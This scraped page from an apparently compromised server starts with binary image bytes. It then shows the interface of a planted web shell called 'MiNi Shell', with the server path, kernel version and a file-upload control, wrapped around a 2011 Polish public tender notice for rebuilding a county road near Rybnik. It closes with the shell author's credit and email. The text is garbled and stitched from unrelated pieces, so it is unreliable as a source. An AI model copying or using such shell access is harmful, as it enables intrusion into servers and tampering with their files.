JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/408518-N-2011.html

<p class="kh_header"><b>Rybnik: Przebudowa drogi powiatowej 5601S na odcinku od przejazdu kolejowego  w Suminie                      do skrzyżowania z ulicą Sportową w Lyskach.</b><br>
<b>Numer ogłoszenia: 408518 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jankowicka 49, 44-200 Rybnik, woj. śląskie, tel. 032 4227478, 4227874, faks 032 4227479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatrybnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej 5601S na odcinku od przejazdu kolejowego  w Suminie                      do skrzyżowania z ulicą Sportową w Lyskach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przebudowa  drogi powiatowej 5601S w Suminie i w Lyskach obejmująca remont nawierzchni jezdni i budowę chodnika wraz z odwodnieniem -  na odcinku  od przejazdu kolejowego w Suminie                         do  skrzyżowania z ulicą Sportową w Lyskach,  dług. 1,161 km , polegająca  m.in. na 
a)  wykonaniu prac przygotowawczych , poprzez m.in.
- roboty pomiarowe przy liniowych robotach ziemnych  - 1,161 km         - karczowanie pni ,  z wywiezieniem karpiny i oczyszczeniem pozostałości         -      2 szt.                              

-  rozbiórkę elementów dróg (krawężniki, obrzeża, nawierzchnie z mas
   min. bitum. i betonowych, ścieki z elementów betonowych, przepusty rurowe ,
   itp. z wywiezieniem gruzu i utylizacją odpadów                                                  -  32,31 m3

b) wykonaniu kanalizacji deszczowej , m.in.    
-  wykopy liniowe oraz przekopy o głęb. do 3,0m koparkami                                - 273,29 m3
-  wykopy liniowe głęb. do 1,5m sposobem ręcznym                                            - 187,24 m3
-  ażurowe umocnienie ścian wykopów                                                                 - 742,62 m3
-  podłoża pod kanały z materiałów sypkich                                                          -   50,45 m3
-  kanały z rur PCV śred. 200 mm                                                                         -   16,00 m 
-  kanały z rur PCV śred. 315 mm                                                                         - 291,20 m 
-  studzienki ściekowe uliczne betonowe śred. 500 mm z osadnikiem,
   bez syfonu                                                                                                          -    8 szt.
-  studnie rewizyjne z kręgów betonowych śred. 1000 mm                                   -    7 szt.
-  zasypywanie wykopów piaskiem na wys. 30 cm ponad wierzch rury                - 181,01 m3
-  zasypywanie wykopów gruntem rodzimym                                                        - 188,75 m3
-  wywóz nadmiaru gruntu                                                                                     - 247,43 m3
-  umocnienie wylotu kolektora śred. 400 mm                                                       -   1 szt.
-  podbudowa z tłucznia kamiennego w-wa dolna gr. 20 cm + górna 10 cm         -  27,40 m3
-  oczyszczenie i skropienie nawierzchni asfaltem                                                -  27,40 m3
-  warstwa wiążąca z miesz. min.asfalt. grub. 4 cm                                              -  27,40 m3
-  warstwa ścieralna z mieszanek min. asfalt. grub. 4 cm                                     -  27,40 m3

c) wykonaniu robót ziemnych , m.in.
-  roboty ziemne poprzeczne z wbudowaniem w nasyp                                       - 205,00 m3
-  roboty ziemne wyk. koparkami podsiębiernymi z transportem urobku              - 557,00 m3
-  ręczne formowanie nasypów                                                                             - 477,00 m3
-  zagęszczanie nasypów ubijakami mechanicznymi                                            - 477,00 m3
-  plantowanie skarp i dna wykopów                                                                     - 948,00 m2    
-  plantowanie skarp i korony nasypów                                                                 -1475,0 m2       
-  umocnienie skarp płytami ażurowymi                                                                -   97,00 m2
-  humusowanie skarp z obsianiem                                                                       - 2326,0 m2 

d)  ułożeniu krawężnika , m.in.
-  ława pod krawężniki betonowa  z oporem, beton kl. C12/15                            -    20,57 m3
-  krawężniki betonowe o wym 15x30 cm                                                             -  366,00 m     

e)  wykonaniu podbudowy betonowej :
-  podbudowa na poszerzeniach z mieszanki betonowej  grub. 18 cm                -    60,20 m2    

f)  budowie chodnika z kostki brukowej betonowej , m.in.
-   obrzeża betonowe o wym. 20  6 cm na podsypce piaskowej                          -   295,0 m       
-   profilowanie i zagęszczanie podłoża pod w-wy konstrukcyjne naw.                -  397,6 m2
-   profilowanie i zagęszczanie podłoża pod w-wy konstrukcyjne naw.              
    na zjazdach                                                                                                      -   23,80 m2
-  podbudowa z kruszywa łamanego grub. 10 cm pod naw. chodnika                  - 397,6 m2      
-  podbudowa z kruszywa łamanego grub. 15 cm pod naw. chodnika                  - 23,80 m2      
-  chodnik z kostki betonowej brukowej gr. 6 cm szarej z udziałem 30% grafit.   -  397,6 m2
-  chodnik z kostki betonowej brukowej gr. 8 cm  czerwonej                                -     23,8 m2

g)  wykonaniu pobocza bitumicznego , m.in.
-  frezowanie nawierzchni bitumicznej gr. 3 cm z odwozem ścinki                       -  412,50 m2      
-  profilowanie i zagęszczanie podłoża pod w-wy konstrukcyjne naw.                  - 1427,25m2
-  ułożenie geowłókniny wzmacniającej  podłoże                                                  - 1161,00m2
-  warstwa dolna podbudowy kruszyw łamanych grub. 20cm na poszerzeniu      - 1427,25m2
-  warstwa górna podbudowy kruszyw łamanych grub.14cm na poszerzeniu      - 1427,25m2
-  oczyszczenie nawierzchni drogowych nieulepszonych                                     - 1427,25m2  
-  oczyszczenie nawierzchni drogowych bitumicznych                                         -   412,50m2  
-  skropienie asfaltem nawierzchni drogowych                                                     - 1839,75m2      
-  warstwa przeciwspękaniowa pod warstwy bitumiczne -  geowłóknina              - 1839,75m2
-  wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową             -   132,46ton
     
h)  przebudowie wjazdów na długości pobocza bitumicznego , m.in.
-  wykonanie ław fundamentowych żwirowych grub. 20 cm                                 -    8,64 m3
-  wykonanie przepustów rurowych - rury PCV śred. 315 mm                             -   72,00m  
-  ścianki czołowe z betonu klasy C 16/20                                                            -   30,0 szt.
-  nawierzchnie z tłucznia kamiennego - w-wa górna grub. 15 cm                      -  155,90m2
-  przełożenie istniejącej kostki brukowej                                                             -    50,00m2
-  obrzeża betonowe o wym 20x6cm                                                                    -      9,00m
-  chodnik z kostki bet. bruk. gr. 6 cm szarej na podb. z tłucznia 10cm
   i podsypce cem.- piaskowej                                                                               -      8,80m2                                                                                                                         

i)  umocnieniu rowu , m.in.
-  umocnienie rowu elementami prefabrykowanymi (korytkami żelbetowymi)        -   743,60m
-  wypełnienie przestrzeni za ściankami gruntem miejscowym przepuszczalnym  -   148,72m3

j) wykonaniu nawierzchni bitumicznej , m.in.
-  oczyszczeniu mechanicznym nawierzchni drogowych bitumicznych                  -  8376,72m2
-  skropieniu asfaltem nawierzchni drogowych                                                       -  8376,72m2
-  mechanicznym wyrównaniu ist. podb. mieszanką min.-asfalt. śr. gr.  3 cm        -     603,12 t
-  skropieniu asfaltem nawierzchni drogowych   przed ułożeniem w-wy ścier.       -   8308,40m2
-  nawierzchnia z mieszanki min. asf. - w-wa ścieralna grub. 5 cm                       -   8304,40m2

k)  wykonaniu zjazdów na drogi gminne , m.in.
                                   
-  oczyszczenie mechaniczne nawierzchni drogowych bitumicznych                     -    258,19m2
-  skropienie asfaltem nawierzchni drogowych                                                       -    258,19m2
-  nawierzchnia z mieszanki min. asf. - w-wa ścieralna grub. 5 cm                       -    258,19m2

l) utwardzeniu poboczy tłuczniem kamiennym                                                      -   135,50m3

m)  oznakowaniu poziomym jezdni farbą do cienkowarstwowego znakowania    -    303,70m2
Zakres rzeczowy obejmuje :
Po stronie prawej drogi
- od km 0+000 - 0+854 utwardzenie pobocza prawego szerokości 1,50 m z przeznaczeniem dla ruchu  
  pieszego , a pozostała część pobocza szerokości 0,5 m ziemne z humusowaniem i obsianiem trawą,
- od km 0+854 - 1+139 chodnik z kostki brukowej betonowej,
- odwodnienie jezdni od km 0+019,5 - 0+835 rowem otwartym z umocnieniem korytkami żelbetowymi ,              
  od km   0+835 - 1+136 projektowana kanalizacja deszczowa z rur śred. 315 mm wraz ze studniami  
  rewizyjnymi   i studzienkami ściekowymi ,
- od km 0+000 - 1+161 remont nawierzchni jezdni polegający na wyrównaniu istniejącej nawierzchni mieszanką
  mineralno - asfaltową warstwą o średniej grubości 3 cm i ułożenie warstwy ścieralnej z betonu asfaltowego 
  grub. 5 cm.

Po stronie lewej drogi
- wykonanie zjazdów z mieszanki mineralno - asfaltowej grub. 5 cm ,
- od km 0+000 - 1+161 utwardzenie pobocza  kruszywem łamanym niesortowanym grub. 10 cm 
 
Szczegółowy zakres robót dotyczący opisu przedmiotu zamówienia ,  technologię wykonania i odbioru robót zawierają:  projekt budowlano - wykonawczy , przedmiary robót oraz szczegółowe specyfikacje techniczne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie 3 lat od udzielenia zamówienia podstawowego, udzielenie dotychczasowemu wykonawcy robót budowlanych zamówień uzupełniających . Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających do wysokości 20% zamówienia podstawowego.
Zamówienia uzupełniające zostaną udzielone po spełnieniu przesłanek określonych w art. 67 ust. 1  pkt 6 ustawy Pzp                 oraz w przypadku zaistnienia następujących sytuacji :
- w przypadku wystąpienia kolizji z nie zinwentaryzowanym uzbrojeniem podziemnym , również w przypadku ujawnienia   
  potrzeby przebudowy lub zabezpieczenia takiego uzbrojenia  wynikającego z jego stanu technicznego bądź  nie  
  zachowania odległości ,a także  w wyniku poleceń właścicieli urządzeń obcych pełniących nadzór branżowy nad 
  inwestycją celem zapewnienia bezpieczeństwa ludzi i mienia,
- w przypadku konieczności na etapie wykonawstwa dokonania zmian  w  projekcie ,
- w przypadku wystąpienia innych sytuacji niezależnych od Zamawiającego np. zasadnych wniosków mieszkańców 
   powodujących konieczność udzielenia  zamówień uzupełniających lub konieczność wykonania prac  niezbędnych                   
   dla  właściwego wykonania przedmiotu  zamówienia .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku , jeżeli Wykonawca  wykaże , że w okresie ostatnich 5 lat przed upływem terminu składania ofert  w  postępowaniu, a jeżeli okres prowadzenia  działalności  jest  krótszy - w tym okresie  wykonał  co najmniej :   2  zamówienia  o wartości co najmniej  900 000,00 złotych brutto każde , polegające na wykonaniu  budowy , przebudowy lub  remontu  drogi o nawierzchni bitumicznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku , jeżeli Wykonawca  wykaże , że ma  do dyspozycji osobę do pełnienia funkcji kierownika budowy  odpowiedzialną za kierowanie  robotami   budowlanymi , posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty względnie do podpisania innych dokumentów składanych wraz z ofertą , o ile 
    prawo do podpisani8a oferty nie wynika z innych dokumentów złożonych wraz z ofertą.
2. Kosztorys ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych 
         przypadkach :
-       przedłużenia procedury przetargowej,
-       niesprzyjających  wykonywaniu prac  zgodnie ze sztuką budowlaną  warunków atmosferycznych  ( np. 
        nawodnienie    gruntu    spowodowane intensywnymi opadami deszczu , zmarznięty grunt itp.),
-      warunków geotechnicznych, których nie można było przewidzieć,
-       wystąpienia konieczności prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami      
        nieruchomości,
-       w przypadku wystąpienia kolizji z nie zinwentaryzowanym uzbrojeniem podziemnym , w tym w przypadku  
        ujawnienia     potrzeby przebudowy lub zabezpieczenia takiego uzbrojenia  wynikającego z jego stanu 
        technicznego bądź  nie   zachowania odległości ,
       -      w przypadku konieczności na etapie wykonawstwa dokonania zmian  w  projekcie i uzyskania odpowiednich 
               decyzji  i  pozwoleń ,
       -      w przypadku wystąpienia innych sytuacji niezależnych od Zamawiającego np. zasadnych wniosków 
              mieszkańców  powodujących konieczność wykonania prac  niezbędnych  dla  właściwego wykonania 
               przedmiotu  zamówienia .
       -       działania sił natury uznanych za klęskę żywiołową.
  2.      Zmiana terminu wykonania umowy może nastąpić wyłącznie aneksem do umowy, tylko o ilość dni które 
           zostaną   udokumentowane.
     3.     Wykonawca nie będzie miał prawa do przedłużenia terminu wykonania umowy , jeżeli przedłużenie terminu 
              wynika  z  przyczyn leżących po stronie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatrybnicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych , 44-200 Rybnik , ul. Jankowicka 49, pok. 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 08:30, miejsce: siedziba Zarządu Dróg Powiatowych w Rybniku , 44-200 Rybnik , ul. Jankowicka 49 , pok. 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com